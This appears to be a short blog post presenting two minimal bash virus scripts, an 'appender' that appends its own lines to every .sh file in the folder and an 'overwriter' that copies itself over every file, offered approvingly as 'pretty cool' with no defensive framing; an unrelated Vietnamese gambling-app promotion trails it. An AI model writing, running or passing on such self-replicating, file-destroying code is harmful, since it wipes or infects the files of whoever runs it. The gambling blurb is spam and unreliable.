Although not very spread (try Googling it), it holds the very principle of the virus algorithm technique. The most simple virus code I have ever seen...
(BASH scripting language)
Appender
for i in *.sh; do
if test ”./$i” != ”$0”; then
tail -n 5 $0 | cat >> $i ;
fi
done
Overwritter
for file in *; do
cp $0 $file
done
Pretty cool!
Tải App Kuwin Đơn Giản Trên Mọi Thiết Bị Điện Thoại
-
Tải app Kuwin hiện là nhu cầu thiết yếu giúp người chơi tiếp cận sân chơi
mọi lúc mọi nơi. Việc sở hữu ứng dụng chính thức sẽ mang đến trải nghiệm
mượt mà,...
2 months ago
0 comments:
Post a Comment